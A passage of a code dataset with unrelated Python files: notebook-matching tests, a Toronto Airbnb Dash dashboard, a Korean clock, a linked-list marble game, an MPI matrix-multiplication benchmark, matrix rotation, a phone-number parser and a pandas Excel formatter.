get_server_for_notebook(remote_notebook_name) == _make_url(notebook_port)\n\n def test_equally_matching_stem_errors(self):\n foo_notebook_name = f\"/home/foo/git/notebook.{SYNC_EXTENSION}.ipynb\"\n bar_notebook_name = f\"/home/bar/git/notebook.{SYNC_EXTENSION}.ipynb\"\n\n foo_port = 1234\n bar_port = 4321\n\n current_notebook_name = f\"/home/tj/git/notebook.{SYNC_EXTENSION}.ipynb\"\n\n register_server(foo_notebook_name, foo_port)\n register_server(bar_notebook_name, bar_port)\n\n assert get_server_for_notebook(foo_notebook_name) == _make_url(foo_port)\n assert get_server_for_notebook(bar_notebook_name) == _make_url(bar_port)\n\n # Can't determine what this server\n with pytest.raises(UnableToFindNotebookException):\n get_server_for_notebook(current_notebook_name)\n\n def test_no_matches(self):\n loaded_notebook_name = f\"/home/tj/notebook.{SYNC_EXTENSION}.ipynb\"\n not_loaded_notebook_name = f\"/home/tj/other.{SYNC_EXTENSION}.ipynb\"\n\n register_server(loaded_notebook_name, 1234)\n\n with pytest.raises(UnableToFindNotebookException):\n get_server_for_notebook(not_loaded_notebook_name)\n","sub_path":"jupyter_ascending/tests/test_notebook_matching.py","file_name":"test_notebook_matching.py","file_ext":"py","file_size_in_byte":3316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"577607428","text":"import numpy as np\r\nimport dash\r\nimport dash_core_components as dcc\r\nimport dash_html_components as html\r\nfrom dash.dependencies import Input, Output\r\nimport plotly.express as px\r\nimport plotly.graph_objects as go\r\nimport pandas as pd\r\nimport glob\r\nimport fnmatch\r\nimport json\r\nfrom plotly.subplots import make_subplots\r\n\r\n#external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\r\n\r\n#app = dash.Dash(__name__, external_stylesheets=external_stylesheets)\r\napp = dash.Dash(__name__, meta_tags=[{\"name\": \"viewport\", \"content\": \"width=device-width\"}])\r\n\r\nserver = app.server\r\n\r\nall_files = glob.glob('data_cleaned/*')\r\nall_files.sort()\r\nprint(all_files)\r\n\r\n\r\n# Store dataframes in a dictionary\r\ndfs_dict = {}\r\n\r\nfor filename in all_files:\r\n df = pd.read_csv(filename, compression='gzip')\r\n dfs_dict[filename[13:-7]] = df\r\n\r\nprint(dfs_dict.keys())\r\n\r\nwith open('neighbourhoods.geojson') as fp:\r\n TRT_geo = json.load(fp)\r\n\r\nlayout = dict(\r\n autosize=True,\r\n automargin=True,\r\n margin=dict(l=30, r=30, b=20, t=40),\r\n hovermode=\"closest\",\r\n plot_bgcolor=\"#F9F9F9\",\r\n paper_bgcolor=\"#F9F9F9\",\r\n legend=dict(font=dict(size=10), orientation=\"h\")\r\n)\r\n\r\ndef_click = {'points': [{'curveNumber': 0, 'pointNumber': 122, 'pointIndex': 122,\r\n 'location': 'Waterfront Communities-The Island', 'z': 1183.66}]}\r\ndef_hov = {'points': [{'curveNumber': 0, 'pointNumber': 23, 'pointIndex': 23,\r\n 'x': '2020 Oct', 'y': 1183.66}]}\r\n\r\ngithub_link = \"App source code: [Github](https://github.com/RobinKongNingLo/dash-toronto-airbnb)\"\r\n\r\ndata_source = \"Dataset source: [Inside Airbnb](http://insideairbnb.com/get-the-data.html)\"\r\n\r\napp.layout = html.Div(\r\n [\r\n html.Div(\r\n [\r\n html.Div(\r\n [\r\n html.A(\r\n html.Img(className=\"logo\", src=app.get_asset_url(\"dash-logo.png\")),\r\n href=\"https://dash.plot.ly/\",\r\n ),\r\n html.H2(\r\n [\r\n \"Toronto Airbnb Data App\",\r\n ],\r\n style={\"text-align\": \"left\"},\r\n ),\r\n\r\n html.P('Select a feature'),\r\n dcc.Dropdown(\r\n id='feature_dropdown',\r\n options=[\r\n {'label': 'Price per Accommodate per Day', 'value': 'price'},\r\n {'label': 'Revenue per Accommodate per Month', 'value': 'revenue'},\r\n {'label': 'Occupancy per Month', 'value': 'occupancy'}\r\n ],\r\n value='revenue'),\r\n html.H3('About this app'),\r\n html.P('Click a neighbourhood from the map to see the data visualization of the neighbourhood, '\r\n 'click a time from the line chart to see the data visualization at the time. '),\r\n html.Div(id=\"github_link\", children=dcc.Markdown(github_link)),\r\n html.Div(id=\"data_set_source\", children=dcc.Markdown(data_source)),\r\n ],\r\n className='pretty_container threehalf columns'\r\n ),\r\n html.Div(\r\n [\r\n html.Div(\r\n [\r\n html.Div(\r\n [\r\n html.P(\"Selected Neighbourhood\"),\r\n html.H6(id=\"neighbourhood_txt\"),\r\n ],\r\n className='eight columns pretty_container'\r\n ),\r\n html.Div(\r\n [\r\n html.P(id=\"avg_1_txt\"),\r\n html.H6(id=\"avg_1_val\"),\r\n ],\r\n className='five columns pretty_container'\r\n ),\r\n html.Div(\r\n [\r\n html.P(id=\"avg_2_txt\"),\r\n html.H6(id=\"avg_2_val\"),\r\n ],\r\n className='five columns pretty_container'\r\n ),\r\n ],\r\n className='row container-display',\r\n ),\r\n html.Div(\r\n [\r\n html.Div(\r\n [\r\n html.H4(id='map_title'),\r\n dcc.Graph(id='map', figure={}, clickData=def_click, config={'displayModeBar': False})\r\n ],\r\n id='mapContainer',\r\n className='seven columns pretty_container'\r\n ),\r\n html.Div(\r\n [\r\n html.H4(id='box_title'),\r\n dcc.Graph(id='box', figure={}, config={'displayModeBar': False})\r\n ],\r\n id='boxContainer',\r\n className='five columns pretty_container'\r\n ),\r\n ],\r\n className='row container-display',\r\n ),\r\n ],\r\n className='eighthalf columns'\r\n ),\r\n ],\r\n className=\"row flex-display\"\r\n ),\r\n html.Div(\r\n [\r\n html.Div(\r\n [\r\n html.H4(id='pie_title'),\r\n dcc.Graph(id='pie', figure={}, config={'displayModeBar': False})\r\n ],\r\n id='pieContainer',\r\n className='pretty_container threehalf columns'\r\n ),\r\n html.Div(\r\n [\r\n html.Div(\r\n [\r\n html.H4(id='line_title'),\r\n dcc.Graph(id='line', figure={}, clickData=def_hov, config={'displayModeBar': False})\r\n ],\r\n id='lineContainer',\r\n className='seven columns pretty_container'\r\n ),\r\n html.Div(\r\n [\r\n html.H4(id='bar_title'),\r\n dcc.Graph(id='bar', figure={}, config={'displayModeBar': False})\r\n ],\r\n id='barContainer',\r\n className='five columns pretty_container'\r\n ),\r\n ],\r\n className='row container-display eighthalf columns',\r\n ),\r\n ],\r\n className=\"row flex-display\"\r\n )\r\n ],\r\n style={\"display\": \"flex\", \"flex-direction\": \"column\"},\r\n)\r\n\r\n\r\n@app.callback(\r\n [Output(component_id='box_title', component_property='children'),\r\n Output(component_id='line_title', component_property='children'),\r\n Output(component_id='bar_title', component_property='children'),\r\n Output(component_id='pie_title', component_property='children')],\r\n [Input(component_id='feature_dropdown', component_property='value'),\r\n Input(component_id='line', component_property='clickData')]\r\n)\r\ndef update_titles(feature, hover_data):\r\n [key_1, key_2] = [key for key in dfs_dict.keys() if fnmatch.fnmatch(key, '*' + hover_data['points'][0]['x'][5:])]\r\n box_title = \"Box Plot of \" + feature.capitalize() #+ \" \" + key_1[9:13] + \" vs \" + key_2[9:]\r\n line_title = \"Line Chart of \" + feature.capitalize() + \" Nov 2018 to Oct 2020\"\r\n bar_title = \"Bar Chart of \" + feature.capitalize() #+ \" \" + key_1[9:13] + \" vs \" + key_2[9:]\r\n pie_title = \"Number of Each Room Type \" #+ key_1[9:13] + \" vs \" + key_2[9:]\r\n return box_title, line_title, bar_title, pie_title\r\n\r\n\r\n@app.callback(\r\n [Output(component_id='map', component_property='figure'),\r\n Output(component_id='map_title', component_property='children')],\r\n [Input(component_id='line', component_property='clickData'),\r\n Input(component_id='feature_dropdown', component_property='value')]\r\n)\r\ndef update_map(hover_data, feature):\r\n print(hover_data)\r\n df_feature = dfs_dict[feature]\r\n dff = df_feature[['neighbourhood_cleansed', 'room_type', hover_data['points'][0]['x']]]\r\n dff = dff.loc[dff['room_type'] == 'Both']\r\n\r\n\r\n\r\n fig_map = px.choropleth_mapbox(dff, geojson=TRT_geo,\r\n locations=\"neighbourhood_cleansed\",\r\n featureidkey=\"properties.neighbourhood\",\r\n color=dff[hover_data['points'][0]['x']],\r\n #color_continuous_scale=[(0.00, \"#ff000d\"), (0.50, \"#007a89\"), (1.00, \"#27408B\")],\r\n color_continuous_scale=\"DarkMint\",\r\n mapbox_style=\"carto-positron\",\r\n zoom=9,\r\n center={\"lat\": 43.722275, \"lon\": -79.406074},\r\n opacity=0.5,\r\n )\r\n\r\n \"\"\"\r\n fig_map = go.Figure(go.Choroplethmapbox(geojson=TRT_geo,\r\n locations=dff.neighbourhood_cleansed,\r\n featureidkey=\"properties.neighbourhood\",\r\n z=dff[hover_data['points'][0]['x']],\r\n marker_opacity=0.5,\r\n colorscale=\"Viridis\",\r\n colorbar=dict(thickness=10, ticklen=0),\r\n marker_line_width=0\r\n ))\r\n \r\n fig_map.update_layout(\r\n mapbox_style=\"carto-positron\",\r\n mapbox_zoom=9,\r\n #marker_opacity=0.5,\r\n mapbox_center={\"lat\": 43.722275, \"lon\": -79.366074},\r\n margin={\"r\": 0, \"t\": 0, \"l\": 0, \"b\": 0},\r\n plot_bgcolor=\"#F9F9F9\",\r\n paper_bgcolor=\"#F9F9F9\",\r\n legend=dict(font=dict(size=10),\r\n orientation=\"h\",\r\n yanchor=\"bottom\",\r\n y=1,\r\n xanchor=\"right\",\r\n x=1\r\n ),\r\n )\r\n \"\"\"\r\n fig_map.update_coloraxes(\r\n colorbar_xpad=10,\r\n colorbar_ypad=10,\r\n colorbar_x=0,\r\n colorbar_thickness=20,\r\n colorbar_title=None\r\n #showscale=False\r\n )\r\n fig_map.update_traces(hovertemplate=None)\r\n fig_map.update_layout(\r\n margin={\"r\": 0, \"t\": 0, \"l\": 0, \"b\": 0},\r\n plot_bgcolor=\"#F9F9F9\",\r\n paper_bgcolor=\"#F9F9F9\",\r\n hoverlabel=dict(\r\n font_size=12,\r\n namelength=-1,\r\n bgcolor=\"#007a89\")\r\n )\r\n map_title = \"Map Overview of \" + feature.capitalize() + \" \" + hover_data['points'][0]['x']\r\n return fig_map, map_title\r\n\r\n\r\n@app.callback(\r\n Output(component_id='line', component_property='figure'),\r\n [Input(component_id='map', component_property='clickData'),\r\n Input(component_id='feature_dropdown', component_property='value')]\r\n)\r\ndef update_line(click_data, feature):\r\n print(click_data)\r\n df_feature = dfs_dict[feature]\r\n dff_pr_feature = df_feature.loc[\r\n (df_feature['neighbourhood_cleansed'] == click_data['points'][0]['location']) & (df_feature['room_type'] == 'Private room')]\r\n dff_eh_feature = df_feature.loc[\r\n (df_feature['neighbourhood_cleansed'] == click_data['points'][0]['location']) & (df_feature['room_type'] == 'Entire home/apt')]\r\n dff_pr_feature = dff_pr_feature.transpose()[2:].reset_index()\r\n dff_pr_feature.columns = ['time', feature]\r\n dff_eh_feature = dff_eh_feature.transpose()[2:].reset_index()\r\n dff_eh_feature.columns = ['time', feature]\r\n fig = go.Figure(go.Scatter(x=dff_pr_feature['time'], y=dff_pr_feature[feature],\r\n mode='lines+markers', name='Private Room', marker_color=\"#ff5a61\"))\r\n fig.add_trace(go.Scatter(x=dff_eh_feature['time'], y=dff_eh_feature[feature],\r\n mode='lines+markers', name='Entire Home/Apt', marker_color=\"#007a89\"))\r\n #fig.update_traces(mode=\"markers+lines\", hovertemplate=None)\r\n\r\n fig.update_layout(\r\n margin={\"r\": 0, \"t\": 0.5, \"l\": 0, \"b\": 0},\r\n plot_bgcolor=\"#F9F9F9\",\r\n paper_bgcolor=\"#F9F9F9\",\r\n legend=dict(font=dict(size=10),\r\n orientation=\"h\",\r\n yanchor=\"bottom\",\r\n y=1,\r\n xanchor=\"right\",\r\n x=1\r\n ),\r\n hovermode=\"x\",\r\n hoverlabel=dict(\r\n font_size=12,\r\n namelength=-1\r\n )\r\n )\r\n return fig\r\n\r\n\r\n@app.callback(\r\n Output(component_id='neighbourhood_txt', component_property='children'),\r\n [Input(component_id='map', component_property='clickData')]\r\n)\r\ndef update_neighbourhood_txt(click_data):\r\n return click_data['points'][0]['location']\r\n\r\n\r\n@app.callback(\r\n [Output(component_id='avg_1_txt', component_property='children'),\r\n Output(component_id='avg_2_txt', component_property='children'),\r\n Output(component_id='avg_1_val', component_property='children'),\r\n Output(component_id='avg_2_val', component_property='children')\r\n ],\r\n [Input(component_id='line', component_property='clickData'),\r\n Input(component_id='map', component_property='clickData'),\r\n Input(component_id='feature_dropdown', component_property='value')]\r\n)\r\ndef update_avg_box(hover_data, click_data, feature):\r\n [key_1, key_2] = [key for key in dfs_dict.keys() if fnmatch.fnmatch(key, '*'+hover_data['points'][0]['x'][5:])]\r\n txt_1 = key_1[9:] + \" Average\"\r\n txt_2 = key_2[9:] + \" Average\"\r\n df_feature = dfs_dict[feature]\r\n val_1 = df_feature.loc[(df_feature['neighbourhood_cleansed'] == click_data['points'][0]['location']) & (df_feature['room_type'] == 'Both')][key_1[9:]]\r\n val_2 = df_feature.loc[(df_feature['neighbourhood_cleansed'] == click_data['points'][0]['location']) & (df_feature['room_type'] == 'Both')][key_2[9:]]\r\n val_1 = format(float(val_1), '0,.2f')\r\n val_2 = format(float(val_2), '0,.2f')\r\n if feature == 'occupancy':\r\n val_1 = val_1 + ' Days'\r\n val_2 = val_2 + ' Days'\r\n else:\r\n val_1 = '$' + val_1\r\n val_2 = '$' + val_2\r\n return txt_1, txt_2, val_1, val_2\r\n\r\n\r\n@app.callback(\r\n Output(component_id='box', component_property='figure'),\r\n [Input(component_id='line', component_property='clickData'),\r\n Input(component_id='map', component_property='clickData'),\r\n Input(component_id='feature_dropdown', component_property='value')]\r\n)\r\ndef update_box(hover_data, click_data, feature):\r\n [key_1, key_2] = [key for key in dfs_dict.keys() if fnmatch.fnmatch(key, '*' + hover_data['points'][0]['x'][5:])]\r\n df_time_1 = dfs_dict[key_1]\r\n df_time_2 = dfs_dict[key_2]\r\n # Column of price in listings tables are called 'price_per_accommodate'\r\n if feature == 'price':\r\n feature = 'price_per_accommodate'\r\n df_time_1 = df_time_1.loc[df_time_1['neighbourhood_cleansed'] == click_data['points'][0]['location']]\r\n df_time_2 = df_time_2.loc[df_time_2['neighbourhood_cleansed'] == click_data['points'][0]['location']]\r\n fig = go.Figure(data=[go.Box(x=df_time_1[\"room_type\"], y=df_time_1[feature], name=key_1[9:], marker_color=\"#ff5a61\"),\r\n go.Box(x=df_time_2[\"room_type\"], y=df_time_2[feature], name=key_2[9:], marker_color=\"#007a89\")])\r\n fig.update_layout(\r\n boxmode='group', # group together boxes of the different traces for each value of x\r\n margin={\"r\": 0, \"t\": 0.5, \"l\": 0, \"b\": 0},\r\n plot_bgcolor=\"#F9F9F9\",\r\n paper_bgcolor=\"#F9F9F9\",\r\n legend=dict(font=dict(size=10),\r\n orientation=\"h\",\r\n yanchor=\"bottom\",\r\n y=1,\r\n xanchor=\"right\",\r\n x=1,\r\n ),\r\n #yaxis=dict(title='Revenue per Accommodate', title_font_family=\"Helvetica\", zeroline=False),\r\n )\r\n fig.update_traces(hovertemplate=\"%{x}
\" + feature.capitalize() + \": %{y}\")\r\n return fig\r\n\r\n\r\n@app.callback(\r\n Output(component_id='pie', component_property='figure'),\r\n [Input(component_id='line', component_property='clickData'),\r\n Input(component_id='map', component_property='clickData')]\r\n)\r\ndef update_pie(hover_data, click_data):\r\n df_count = dfs_dict['count']\r\n df_count = df_count.loc[(df_count['neighbourhood_cleansed'] == click_data['points'][0]['location'])\r\n & (df_count['room_type'] != 'Both')]\r\n [key_1, key_2] = [key for key in dfs_dict.keys() if fnmatch.fnmatch(key, '*' + hover_data['points'][0]['x'][5:])]\r\n fig = make_subplots(rows=1, cols=2, specs=[[{'type':'domain'}, {'type':'domain'}]], subplot_titles=[key_1[9:], key_2[9:]])\r\n fig.add_trace(go.Pie(labels=df_count['room_type'], values=df_count[key_1[9:]], name=key_1[9:],\r\n textinfo='value', insidetextorientation='radial'), 1, 1)\r\n fig.add_trace(go.Pie(labels=df_count['room_type'], values=df_count[key_2[9:]], name=key_2[9:],\r\n textinfo='value', insidetextorientation='radial'), 1, 2)\r\n fig.update_traces(hole=.3, marker=dict(colors=['#007a89', '#ff5a61']), hovertemplate=\"%{label}:
Number: %{value}
Percentage: %{percent}\")\r\n fig.update_layout( # group together boxes of the different traces for each value of x\r\n margin={\"r\": 15.5, \"t\": 0, \"l\": 15.5, \"b\": 15.5},\r\n plot_bgcolor=\"#F9F9F9\",\r\n paper_bgcolor=\"#F9F9F9\",\r\n legend=dict(font=dict(size=10),\r\n orientation=\"h\",\r\n yanchor=\"bottom\",\r\n y=1,\r\n xanchor=\"right\",\r\n x=1,\r\n ),\r\n annotations=[{'font': {'size': 12},\r\n 'y': -0.1},\r\n {'font': {'size': 12},\r\n 'y': -0.1}\r\n ]\r\n #annotations=[dict(text=key_1[9:], x=0.14, y=-0.1, font_size=12, showarrow=False),\r\n #dict(text=key_2[9:], x=0.87, y=-0.1, font_size=12, showarrow=False)]\r\n )\r\n return fig\r\n\r\n\r\n@app.callback(\r\n Output(component_id='bar', component_property='figure'),\r\n [Input(component_id='line', component_property='clickData'),\r\n Input(component_id='map', component_property='clickData'),\r\n Input(component_id='feature_dropdown', component_property='value')]\r\n)\r\ndef update_bar(hover_data, click_data, feature):\r\n [key_1, key_2] = [key for key in dfs_dict.keys() if fnmatch.fnmatch(key, '*' + hover_data['points'][0]['x'][5:])]\r\n df_feature = dfs_dict[feature]\r\n df_feature = df_feature.loc[(df_feature['neighbourhood_cleansed'] == click_data['points'][0]['location'])\r\n & (df_feature['room_type'] != 'Both')]\r\n fig = go.Figure(data=[go.Bar(name=key_1[9:], x=df_feature['room_type'], y=df_feature[key_1[9:]], marker_color=\"#ff5a61\"),\r\n go.Bar(name=key_2[9:], x=df_feature['room_type'], y=df_feature[key_2[9:]], marker_color=\"#007a89\")])\r\n fig.update_traces(hovertemplate=\"%{x}
\" + feature.capitalize() + \": %{y}\")\r\n fig.update_layout(\r\n boxmode='group', # group together boxes of the different traces for each value of x\r\n margin={\"r\": 0, \"t\": 0.5, \"l\": 0, \"b\": 0},\r\n plot_bgcolor=\"#F9F9F9\",\r\n paper_bgcolor=\"#F9F9F9\",\r\n legend=dict(font=dict(size=10),\r\n orientation=\"h\",\r\n yanchor=\"bottom\",\r\n y=1,\r\n xanchor=\"right\",\r\n x=1,\r\n ),\r\n # yaxis=dict(title='Revenue per Accommodate', title_font_family=\"Helvetica\", zeroline=False),\r\n )\r\n return fig\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run_server(debug=True)\r\n","sub_path":"dashapp.py","file_name":"dashapp.py","file_ext":"py","file_size_in_byte":20816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"62441785","text":"class ck :#ChangeToKorean\n original_num = [\"한\", \"두\", \"세\", \"네\", \"다섯\", \"여섯\", \"일곱\", \"여덟\", \"아홉\", \"열\"]\n chinese_num = [\"\", \"일\",\"이\", \"삼\", \"사\", \"오\", \"육\", \"칠\", \"팔\", \"구\", \"십\"]\n def hour(self, hour) :\n self.hour = hour\n if self.hour < 11 :\n print(ck.original_num[self.hour-1], end='')\n else :\n print(self.hour)\n print(ck.original_num[9] + ck.original_num[self.hour-11], end='')\n print(\" 시\")\n def minute(self, minute) :\n self.minute = minute\n if self.minute <= 10 :\n print(ck.chinese_num[minute - 1], end='')#10이하의 수는 그냥 minute을 출력\n\n elif self.minute > 10 :\n self.minute_one = self.minute#1의 자리 수를 위해 minute_one을 정의\n while self.minute_one > 11 :\n self.minute_one -= 10#minute_one에 minute의 1의 자리 숫자 정의\n self.minute = int(self.minute / 10)#minute에 십자리 수를 일의 자리 수로 바꿔준다. / int를 사용한 이유 : float형으로 저장되버리기 때문\n print(ck.chinese_num[self.minute] + ck.chinese_num[10], end='')\n if self.minute_one != 0 :\n print(\" \"+ck.chinese_num[self.minute_one], end='')\n print(\"분\")\n\nimport time\nck = ck()\nhour = time.localtime()[3]\n\nif hour <= 12 :\n apm = \"오전\"\nelse :\n apm = \"오후\"\n hour -= 12\n\nprint(apm+\" \", end=\"\")\nck.hour(hour)\nck.minute(time.gmtime()[4])\n","sub_path":"hangul-clock.py","file_name":"hangul-clock.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"183125310","text":"# TODO: rewrite to C++?\nclass LinkedList:\n class Node:\n def __init__(self, value, prev=None, next=None):\n self.value = value\n self.prev = prev if prev else self\n self.next = next if next else self\n\n def __repr__(self):\n return \"{0}\".format(self.value)\n\n def __init__(self):\n self.number_of_nodes = 0\n self.current = None\n\n def __repr__(self):\n output = \"\"\n current = self.current.prev\n while current is not self.current:\n output += \"{0} \".format(current)\n current = current.prev\n output += \"({0})\".format(self.current)\n current = self.current.next\n while current is not self.current:\n output += \" {0}\".format(current)\n current = current.next\n return output\n\n def get_current(self):\n return self.current\n\n def set_current(self, node):\n self.current = node\n\n def insert(self, value):\n \"\"\"\n Insert a new node before current node.\n \"\"\"\n if not self.current:\n self.current = self.Node(value)\n else:\n prev = self.current.prev\n next = self.current\n self.current = self.Node(value, prev, next)\n prev.next = self.current\n next.prev = self.current\n self.number_of_nodes += 1\n return self.get_current()\n\n def iterate(self, idx):\n while idx < 0:\n self.current = self.current.prev\n idx += 1\n while idx > 0:\n self.current = self.current.next\n idx -= 1\n return self.get_current()\n\n def remove(self):\n \"\"\"\n Remove current node. Next node will be current's node previous.\n \"\"\"\n\n if self.number_of_nodes == 1:\n del self.current\n self.current = None\n else:\n current = self.current\n self.current.prev.next = self.current.next\n self.current.next.prev = self.current.prev\n self.current = self.current.prev\n del current\n self.number_of_nodes -= 1\n\ndef solve(num_of_players, last_marble):\n scores = num_of_players * [0]\n marbles = LinkedList()\n marbles.insert(0)\n marble = 1\n while marble <= last_marble:\n for player in range(num_of_players):\n if marble % 23 == 0:\n marbles.iterate(-7)\n scores[player] += marbles.get_current().value + marble\n marbles.remove()\n marbles.iterate(1)\n else:\n marbles.iterate(2)\n marbles.insert(marble)\n marble += 1\n return max(scores)\n\ndef first_star(input):\n num_of_players = int(input[0].split()[0])\n last_marble = int(input[0].split()[6])\n return solve(num_of_players, last_marble)\n\ndef second_star(input):\n num_of_players = int(input[0].split()[0])\n last_marble = int(input[0].split()[6])\n return solve(num_of_players, last_marble * 100)","sub_path":"day09/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"30057332","text":"\"\"\"\nName: Heecheon Park\nDate: September 6th 2019\nMinnesota State University Moorhead\n\nRunning 1000x1000 matrix multiplication with list and mpi\nwith 5 processors.\n\n\nExecution Method:\n\nmpiexec -np 5 python3 mpi_list_matmult.py\n\"\"\"\nfrom mpi4py import MPI\nfrom numba import njit, jit\nimport numpy as np\nimport sys\nimport time\n\nMASTER = 0\n\ndef main():\n \n COMM = MPI.COMM_WORLD\n RANK = COMM.Get_rank()\n SIZE = COMM.Get_size()\n\n #print(SIZE)\n\n col_split = 1000 // (SIZE - 1)\n chunkSize = int(col_split) * 1000\n offset = 1000000 / (SIZE - 1)\n local_row = 1000 / (SIZE - 1)\n\n list_mat = []\n list_mat2 = []\n local_mat = []\n local_mat2 = []\n local_output_mat = []\n gathered_output_mat = []\n\n\n startTime = 0.0\n endTime = 0.0\n \n #print(\"MPI Initiated\")\n with open(\"1000x1000_matrix.txt\",'r') as f:\n for line in f:\n int_string_list = line.split()\n float_list = [float(i) for i in int_string_list]\n for i in float_list:\n list_mat.append(i)\n list_mat2.append(i)\n\n #print(\"Read from file done.\")\n f.close()\n\n startTime = MPI.Wtime()\n if RANK == MASTER:\n for process in range(1, SIZE):\n COMM.send(list_mat[(process-1) * chunkSize:], process, 1)\n COMM.send(list_mat2, process, 2)\n #print(\"Send from Master done.\")\n\n if RANK != MASTER:\n local_mat = COMM.recv(source=MASTER, tag=1)\n local_mat2 = COMM.recv(source=MASTER, tag=2)\n #print(\"Recv from client done.\")\n local_output_mat = [0 for zero in range(col_split * 1000)]\n mat_mult_1d(local_mat, col_split, 1000, local_mat2, 1000, 1000, local_output_mat, col_split, 1000)\n #print(local_output_mat[(col_split * 1000) - 1])\n COMM.send(local_output_mat, MASTER, 3)\n #print(\"Send from client done.\")\n\n if RANK == MASTER:\n for process in range(1, SIZE):\n gathered_output_mat[(process-1) * chunkSize:] = COMM.recv(source=process, tag=3)\n\n #print(\"Recv from client done.\")\n #print(gathered_output_mat[999999])\n endTime = MPI.Wtime()\n print(\"%s\" % (endTime - startTime))\n\n#@jit\ndef mat_mult_1d(mat1, mat1_row, mat1_col, mat2, mat2_row, mat2_col, output_mat, output_mat_row, output_mat_col):\n \n #start_time = time.time()\n\n for i in range(int(mat1_row)):\n for j in range(int(mat2_col)):\n var_sum = float(0.0)\n for k in range(int(mat2_row)):\n var_sum += mat1[i * mat1_col + k] * mat2[k * mat2_col + j]\n output_mat[i * output_mat_col + j] = var_sum\n #end_time = time.time()\n\n #print(type(output_mat[0]), \"took\",\"--- %s seconds ---\" % (end_time - start_time))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"benchmarks/InProgress/mpi_matmul_sr_1dList.py","file_name":"mpi_matmul_sr_1dList.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"652705117","text":"def rotate_matrix(mat, sz):\n\n rm_helper(mat, sz, 0)\n\n\ndef rm_helper(mat, sz, offset):\n\n if sz <= 1:\n return\n\n for x in range(sz-1):\n\n # Save top row\n storage = mat[0 + offset][x + offset]\n\n # Right column -> top row\n mat[0 + offset][x + offset] = mat[x + offset][(sz-1) + offset]\n\n # Bottom row -> right column\n mat[x + offset][(sz-1) + offset] = mat[(sz-1) + offset][(sz-1-x) + offset]\n\n # Left column -> bottom row\n mat[(sz-1) + offset][(sz-1-x) + offset] = mat[(sz-1-x) + offset][0 + offset]\n\n # Top row (saved) -> left column\n mat[(sz-1-x) + offset][0 + offset] = storage\n\n # Do inner matrix.\n rm_helper(mat, sz-2, offset+1)\n","sub_path":"1. Arrays and Strings/strings_seven.py","file_name":"strings_seven.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"233430222","text":"import re\n\n\nclass Phone:\n def __init__(self, phone_number):\n m = re.search(\n r'''^(?:\\+?1)?\\s*\n \\(?(?P[2-9]\\d\\d)\\)?\n [. -]*\n (?P[2-9]\\d\\d)\n [. -]*\n (?P\\d{4})\n \\s*$''',\n phone_number, flags=re.VERBOSE)\n\n if m is None:\n raise ValueError(\"Invalid number\")\n\n self.area_code = m.group(\"area\")\n self.exchange_code = m.group(\"exchange\")\n self.subscriber_code = m.group(\"subscriber\")\n self.number = self.area_code + self.exchange_code + self.subscriber_code\n\n def pretty(self):\n return f\"({self.area_code}) {self.exchange_code}-{self.subscriber_code}\"\n","sub_path":"python/phone-number/phone_number.py","file_name":"phone_number.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"376209176","text":"import os\ndirname = os.path.dirname(os.path.realpath(__file__))\nrootdir = os.path.dirname(dirname)\n\nimport sys\nsys.path.insert(0, rootdir)\n\n#from os import errno\n\nimport time\nimport unittest\n\nimport pandas as pd\nimport xlsxwriter\n\nfrom wrappers.logger import loggerFetch\n\n###\n\n\n#######################\n# Global Declarations\n#######################\n\ntimeout = 10\n#dirname = 'BasiaSamples'\n\n\n#############\n# Functions\n#############\n\ndef get_col_widths(dataframe):\n # First we find the maximum length of the index column \n idx_max = max([len(str(s)) for s in dataframe.index.values] + [len(str(dataframe.index.name))])\n # Then, we concatenate this to the max of the lengths of column name and its values for each column, left to right\n return [idx_max] + [max([len(str(s)) for s in dataframe[col].values] + [len(col)]) for col in dataframe.columns]\n\n\n\ndef printify(logger, filename=None, max_width=None):\n if not filename:\n filename = 'z.csv'\n xlsfile = filename.replace('.csv', '.xlsx')\n logger.info('Printify file [%s]' % filename)\n\n if not max_width:\n max_width = 25\n\n fields = ['गांव', 'WorkerID']\n df = pd.read_csv(filename, index_col='WorkerID', header=0, encoding = 'utf-8-sig') # , index_col=fields)\n\n #logger.info(df)\n print(df.head())\n if 'sample' in filename:\n df = df.sort_values(by=['गांव', 'Category', 'WorkerID'], ascending=[True, False, True])\n else:\n #df = df.sort_values(by=['गांव', df.columns[6], df.columns[0]], ascending=[True, False, True])\n df = df.sort_values(by=['गांव', 'पेमेंट की स्तिथि', 'WorkerID'], ascending=[True, False, True])\n\n '''\n df.columns[0] = 'Sl No.'\n df['Sl No.'] = df.index\n '''\n df = df.reset_index()\n df.insert(0, 'Sl No.', range(1, len(df)+1))\n df.set_index('Sl No.', inplace=True)\n #df.reset_index(drop = True, inplace = True)\n\n print(df.head())\n\n #df.style.set_table_styles([dict(selector=\"th\",props=[('max-width', '50px')])])\n #s.str.wrap(12)\n #print(df.style)\n #logger.info(df)\n\n \n # Create a Pandas Excel writer using XlsxWriter as the engine.\n writer = pd.ExcelWriter(xlsfile, engine='xlsxwriter')\n\n # Convert the dataframe to an XlsxWriter Excel object.\n df.to_excel(writer, sheet_name='Sheet1')\n\n # Get the xlsxwriter workbook and worksheet objects.\n workbook = writer.book\n worksheet = writer.sheets['Sheet1']\n\n \n ####################################\n ########### Page Setup #############\n ####################################\n\n worksheet.set_landscape()\n worksheet.set_paper(9) # A4\n # worksheet.set_zoom(66)\n # worksheet.center_horizontally()\n # worksheet.center_vertically()\n\n # Set Margins - worksheet.set_margins([left=0.7,] right=0.7,] top=0.75,] bottom=0.75]]])\n # worksheet.set_margins(0.7, 